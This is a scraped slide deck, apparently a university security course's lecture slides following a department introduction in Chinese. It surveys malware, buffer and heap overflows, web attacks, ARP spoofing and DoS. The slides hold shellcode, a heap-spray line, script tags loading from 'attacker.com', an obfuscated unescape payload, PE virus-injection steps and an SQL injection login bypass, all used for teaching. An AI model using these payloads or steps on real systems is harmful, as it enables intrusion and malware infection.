Upload
kristopher-sherman
View
238
Download
0
Embed Size (px)
Citation preview
1
非政府、同儕間的審查機制 (Peer-review)。以學生學習成果為導向 (Outcomes-based),確保系所的教育品質。
確認系所能夠持續達成其自訂的教育目標及其畢業生具備專業所需的核心能力。
透過認證機制維繫教育品質並追求持續改善。
具備一定的教育品質有利於系所對國內外招生畢業生的學歷受國際認可 2007年起即成為國際工程教育認證協定
Washington Accord會員
追求學術卓越,增進人類福祉兼顧博雅專精,培養領導人才開拓尖端領域,躋身一流大學
訓練獨立思考之專業能力養成團隊合作之互助精神建立開放多元之學習態度培養服務關懷之人文素養拓展創新前瞻之國際視野
大學部大學部
資工碩士班資工碩士班
軟工碩士班軟工碩士班
碩士在職專班碩士在職專班
博士班博士班
培養運用資訊科技解決問題之專業能力養成專案開發及溝通協調之能力建立開放多元之終身學習態度拓展創新前瞻之國際視野
大學部大學部
資工碩士班資工碩士班
軟工碩士班軟工碩士班
碩士在職專班碩士在職專班
博士班博士班
培養運用軟體工程研發軟體之專業能力養成跨領域專案開發及溝通協調之能力建立開放多元之終身學習態度拓展創新前瞻之國際視野
大學部大學部
資工碩士班資工碩士班
軟工碩士班軟工碩士班
碩士在職專班碩士在職專班
博士班博士班
培養運用資訊科技解決問題之專業能力養成跨領域專案開發及溝通協調之技能培育具備創意性軟硬體整合能力之人才
大學部大學部
資工碩士班資工碩士班
軟工碩士班軟工碩士班
碩士在職專班碩士在職專班
博士班博士班
陶冶全方位資訊科學之專業知識訓練尖端資訊科技之專業能力養成跨領域專案開發及溝通協調能力建立開放多元之終身學習態度拓展創新前瞻之國際視野
大學部大學部
資工碩士班資工碩士班
軟工碩士班軟工碩士班
碩士在職專班碩士在職專班
博士班博士班
Desktop Smartphone Cloud Infrastructure
◦ Router◦ DNS server
M2M Smart Grid
11
Malware: Logic Bombs, Key Logger, Dialer, URL Injection, Trojan Horses, and Spyware.
Internet Worms, Buffer Overflow Attacks, and Heap Overflow Attacks
Return-into-libc attacks and BOA Countermeasures and Botnet
Disk Layout, BIOS, and Viruses Macro Viruses and Boot Record Viruses Backdoors, sniffer Rootkits for Linux/Unix
12
Magic Cookies and Web Bugs HTTP cookies Cross-Site Scripting (XSS) and SQL Injection SQL Injection and Account Stealing Account Stealing, TCP Session Hijacking New Year, the school is not in session. ARP Spoofing and Format String Attacks, and
DoS/DDoS Attacks
13
14
Trojan Horse [Wikipedia]
15
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software.
Trojans use false and fake names to trick users into executing them. ◦ These strategies are often collectively termed social
engineering. A Trojan is designed to operate with functions
unknown to the victim. The useful, or seemingly useful, functions serve
as camouflage for these undesired functions.
16
Websites. E-mails. Downloaded Files.
17
Spyware [Wikipedia]
18
Spyware is computer software that is installed surreptitiously on a personal computer to ◦ monitor ◦ intercept or ◦ take partial control over
the user's interaction with the computer, without the user's informed consent.
19
20
21
Spyware does not directly spread in the manner of a computer virus or worm:◦ generally, an infected system does not attempt to
transmit the infection to other computers. Instead, spyware gets on a system
◦ through deception of the user or ◦ through exploitation of software vulnerabilities.
22
Malicious websites may attempt to install spyware on readers' computers. ◦ In this screenshot a website has triggered a pop-up that
offers spyware in the guise of a security upgrade.
23
The BearShare file-trading program, "supported" by WhenU spyware. In order to install BearShare, users must agree to install "the SAVE!
bundle" from WhenU. The installer provides only a tiny window in which to read the lengthy
license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to WhenU servers.
Stack Smashing Attacks
25
Overwritten control transfer structures, such as return addresses or function pointers, to redirect program execution flow to desired code.
Attack strings carry both code and address(es) of the code entry point.
26
kernel address space
Libraries
heap
BSS
data
code
high address
low address
stack
main()
{ :
G(1);
}
void G(int a)
{
:
H(3);
}
void H(int c)
{
:
}
env, argv, argc
EIP
main
G
H
27
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Input String: abc
c
b
a
G’s stack frame
0xabc
0xaba0xabb
i
ebp
esp
28
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
addrress oxabc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Injected Code0xabc
Attack String: xxInjected Codexy0xabc
Length=108 bytes
0xaba0xabb x
x
x
y
i
X : 1 byte
y : 4 bytes
ebp
esp
The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege.
The injected code is already in machine instruction form; therefore, a CPU can directly execute it.◦ However the above fact also means that the injected code
must match the CPU type of the attacked host. Usually the injected code will fork a shell;
hence, after an attack, an attacker could have a root shell.
In order to be able to interact with the newly forked root shell, the injected code usually need to execute the following two steps:◦ Open a socket.◦ Redirect standard input and output of the newly
forked root shell to the socket.
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
Exploit World MILWORM Metasploit Securiteam
33
Heap/Data/BSS Overflow Attacks
34
Similarly to stack smashing attacks, attackers overflow a sensitive data structure by providing a buffer which is adjacent to the sensitive data structure more data than the buffer can store; hence, to overflow the sensitive data structure.◦ The sensitive data structure may contain:
A function pointer A pointer to a string … and so on.
Both the buffer and the sensitive data structure may locate at the heap or data or bss section.
35
The heap is an area in memory that is dynamically allocated by the application by using a system call, such as malloc().◦ On most systems, the heap grows up (towards
higher addresses). The data section initialized at compile-
time. The bss section contains uninitialized
data, and is allocated at run-time. ◦ Until it is written to, it remains zeroed (or at least
from the application's point-of-view).
36
#define BUFSIZE 16 int main() { int i=0; char *buf1 = (char *)malloc(BUFSIZE); char *buf2 = (char *)malloc(BUFSIZE); : while((*(buf1+i)=getchar())!=EOF) i++; : }
buf2
Sensitive data
buf1
37
#define BUFSIZE 16 int main(int argc, char **argv) { FILE *tmpfd; static char buf[BUFSIZE], char *tmpfile; : tmpfile = "/tmp/vulprog.tmp"; gets(buf); tmpfd = fopen(tmpfile, "w"); :}
tmpfilebuf
pmt.g..tmt/
dwssap/cte/
Heap Spray and Drive-by Download
Heap spraying is a technique used in exploits to facilitate arbitrary code execution.
Heap spraying is a security attack using a strategy of allocating many objects containing the attacker’s exploit code in an application’s heap.
Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.
memory = new Array(); for (i=0;i<700;i++) memory[i] = block + shellcode;
Download of spyware, a computer virus or any kind of malware that happens without knowledge of the user.
Drive-by downloads may happen by◦ visiting a website◦ viewing an e-mail message or◦ by clicking on a deceptive popup window.
Good web serverGood web serverVulnerable browserVulnerable browser
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
Malicious web server
Malicious web server
attacker.combad.htm
Client side WWW
Good web serverGood web serverVulnerable browserVulnerable browser
Malicious web server
Malicious web server
attacker.com
bad.htm
attacker2.com
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
Client side WWW
45
Botnet [Trend Micro]
46
A botnet (zombie army or drone army) refers to a pool of compromised computers that are under the command of a single attacker, or a small group of attackers, known as a botmaster.
47
Attacking behavior C&C models Rally mechanisms Communication protocols Observable botnet activities Evasion Techniques
48
Fast Flux [Riden][SSAC]
49
Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes.
These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.
50
The goal of fast-flux is for a fully qualified domain name (such as www.example.com) to have multiple (hundreds or even thousands) IP addresses assigned to it.
These IP addresses are swapped in and out of flux with extreme frequency, using a combination of◦ round-robin IP addresses and◦ a very short Time-To-Live (TTL) for any given
particular DNS Resource Record (RR).
51
52
53
54
55
56
Inject Virus
57
Step 1: Find section header i which has the largest PointerToRawData value among all the section headers. In other words, its corresponding section is the last section in this file.
40 bytes
40=28h
Step 2: Added to the size of the virus.
Step 3: according to the value of FileAlignment in structure IMAGE_OPTIONAL_HEADER, round VirtualSize. Then save the result to this field.
58
40 bytes
40=28h
16 bytes
16=10h
Step 4: VirtualAddress + old value of VirtualSize. Then save the result to AddressOfEntryPoint
Step 5: Add (new SizeOfRawData – old SizeOfRawData )
59
40 bytes
40=28h
Step 6: make it executable, code and writable, so we have to OR it with 0x00000020 (code), 0x20000000 ( executable ) and 0x80000000 ( writable ).
Step 7: append the virus to this file.
60
BackDoors
61
Piece of code written into applications or operating systems to grant programmers access to programs without requiring them to go through the normal methods of access authentication.
62
Rootkit
63
Rootkit name are combination from two words, “root” and “kit”. ◦ “Root” was taken from “root,”
a name of UNIX administrator, which is the highest-access level in UNIX environments.
◦ “kit” can be referred as tools. From this word we can interpret rootkit as
◦ tools or ◦ collection of tools
that enable an attacker to keep the root power on the compromised system.
In order to keep the continuously power over the compromised server, he/she should hide their presence from being detected by administrator.
64
Cross-site Scripting
65
66
Web Server/PHP Interpreter
DBMS
Alice<script>…</script> insert into messages
values(‘Alice’,’<script> …’);
user message
Alice <script> …
select * from messages …
<html>…Alice wrote <script>…</script> …
Bonnie
Persistent Cross-Site Scripting [Raymond Mui et al.]
Browser/JavascriptExecute script with privilegesOf the origin site
68
Cross-site Request Forgery[Wikipedia]
69
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
70
SQL Injection [SK]
71
Many web pages take parameters from web users, and make SQL query to the database. ◦ Take for instance when a user login a web page,
the web page accepts that user name and password and makes SQL query to the database to check if the user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
72
Start with a single quote trick. Input something like:hi' or 1=1--
into login, or password, or even in the URL. Example:
- Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://duck/index.asp?id=hi' or 1=1—
If luck is on your side, you will get login without any login name or password.
73
MA Simulation
74
Host A Host B
a
b
c
d
e
f
g
hSending window
Receiving window
100
600
75
Host A Host B
a
b
c
d
e
f
g
hSending window
Receiving window
76
Host A Host B
a
b
c
d
e
f
g
hSending window
Receiving window
attacker
77
Host A Host B
a
b
c
d
e
f
g
hSending window
Receiving window
attacker
Host A closes its socket due to receiving strange response from Host B
IP pkt
78
Host A Host B
a
b
c
d
e
f
g
hSending window
Receiving window
attacker
RST
IP pkt
ARP Spoofing
79
80
The Address Resolution Protocol is used by each host on an IP network to map local IP addresses to hardware addresses or MAC addresses.
Here is a quick look at how this protocol works.◦ Say that Host A (IP address 192.168.1. 100) wants to send
data to Host B (IP address 192.168.1.250). No prior communications have occurred between Hosts A and B, so the ARP table entries for Host B on Host A are empty.
◦ Host A broadcasts an ARP request packet indicating that the owner of the IP address 192.168.1.250 should respond to Host A at 192.168.1.100 with its MAC address. The broadcast packet is sent to every machine in the network segment, and only the true owner of the IP address 192.168.1.250 should respond.
◦ All other hosts discard this request packet, but Host A receives an ARP reply packet from Host B indicating that its MAC address is BB:BB:BB:BB:BB:BB. Host A updates its ARP table, and can now send data to Host B.
81
82
Denial of Service (DoS) Attacks&
Distributed Denial of Service (DDoS) Attacks
83
A DoS/DDoS attack is a type of attack technique◦ by saturating the victim system with enormous
network traffic to the point of unresponsiveness to the legitimate users
or ◦ by crashing the victim system so that it is no
longer available to legitimate users
84
Flood Attack:◦ Smurf Flood Attack.◦TCP SYN Flood Attack.◦UDP Flood Attack.◦ ICMP Flood Attack.
Malformed Packet Attack:◦ Ping of Death Attack.◦ Chargen Attack.◦ TearDrop Attack.◦ Land Attack.
85
host A
host V
V
VVVV
1
2
3
4
host 1
host 2
host 3
host 4
86
attacker
master master master
slave slave slave slave slave slave slave slave
victim
victim
87
Format String Attacks
88
b bytesaddress to the string of interested
b %c %s
Format string
output of printf()
Assume the format string is stored above the printf()’s activation record.